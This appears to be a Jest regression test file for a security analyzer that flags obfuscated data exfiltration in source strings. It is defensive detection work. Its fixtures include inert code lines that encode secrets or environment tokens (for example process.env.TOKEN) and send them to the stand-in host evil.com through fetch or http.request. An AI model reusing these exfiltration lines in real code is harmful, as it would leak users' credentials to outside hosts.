patterns.test.ts
import { analyzeContent } from '../index';
import { DANGEROUS_PATTERNS } from '../patterns';
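/**
 * Regression suite for the analyzer's obfuscation heuristics.
 *
 * Each fixture is an inert source string passed to `analyzeContent`; nothing
 * in this file is executed as code. A case pins the `riskLevel` the analyzer
 * reports for one encoding or obfuscation shape (base64, hex, char codes,
 * string reversal, concatenation) combined with an outbound call.
 *
 * NOTE(review): the second argument `'test'` is presumably a source label;
 * confirm against `analyzeContent`'s signature.
 * NOTE(review): `evil.com` is a registrable domain. The fixtures are never
 * run, but a reserved name would be safer if the patterns do not key on the
 * host; confirm before changing, since the strings are the test input.
 */
describe('Obfuscation detection patterns', () => {
  const riskCases: ReadonlyArray<{ name: string; code: string; expected: string }> = [
    {
      name: 'detects base64-encoded exfiltration',
      code: `const data = btoa(secret); fetch('https://evil.com', { method: 'POST', body: data });`,
      expected: 'high',
    },
    {
      // Reading process.env before encoding is what lifts this to critical.
      name: 'detects base64-encoded env exfiltration (critical)',
      code: `const payload = btoa(process.env.SECRET); fetch('https://evil.com', { body: payload });`,
      expected: 'critical',
    },
    {
      // NOTE(review): Buffer.from(x, 'hex') decodes hex rather than encoding
      // to it; the name is kept for continuity with existing test reports.
      name: 'detects hex-encoded exfiltration',
      code: `const data = Buffer.from(secret, 'hex'); send(data);`,
      expected: 'high',
    },
    {
      name: 'detects charCode obfuscation for exfiltration',
      code: `const s = String.fromCharCode(97,98,99); fetch('/log?'+s);`,
      expected: 'high',
    },
    {
      name: 'detects charCode-built credential exfiltration (critical)',
      code: `const s = String.fromCharCode(...process.env.key.split('')); send(s);`,
      expected: 'critical',
    },
    {
      // '密钥' is Chinese for "secret key". Flagged at medium: maybe not high
      // yet, but it should be reported. The original file carried this case
      // twice with identical input and assertion; one copy is kept.
      name: 'detects string reversal obfuscation',
      code: `const hidden = '密钥'.split('').reverse().join(''); send(hidden);`,
      expected: 'medium',
    },
    {
      // The original file ran this input twice: once only checking that a
      // riskLevel property exists, once asserting 'medium'. The stricter
      // assertion implies the weaker one, so a single case remains.
      name: 'detects suspicious concatenation with env',
      code: `const p1 = process.env.A; const p2 = 'x'; const p3 = 'y'; fetch('/?'+p1+p2+p3);`,
      expected: 'medium',
    },
    {
      name: 'detects atob decoding followed by send',
      code: `const decoded = atob(encoded); fetch('https://evil.com', { body: decoded });`,
      expected: 'high',
    },
    {
      name: 'detects Buffer.from with hex and env',
      code: `const data = Buffer.from(process.env.TOKEN, 'hex'); http.request({ host: 'evil.com', body: data });`,
      expected: 'critical',
    },
    {
      name: 'detects multiple charCode calls to build sensitive string',
      code: `const s = String.fromCharCode(80,97,115,115) + String.fromCharCode(87,111,114,100); fetch('/?'+s);`,
      expected: 'high',
    },
  ];

  // A plain loop registers one test per row without relying on a
  // framework-specific table API.
  for (const { name, code, expected } of riskCases) {
    it(name, () => {
      const result = analyzeContent(code, 'test');
      expect(result.riskLevel).toBe(expected);
    });
  }

  // Every case above is a positive. Without a benign control, a pattern that
  // flags any use of btoa/atob/Buffer.from would still pass this suite.
  it.todo('does not raise the risk level for encoding calls that have no outbound sink');
});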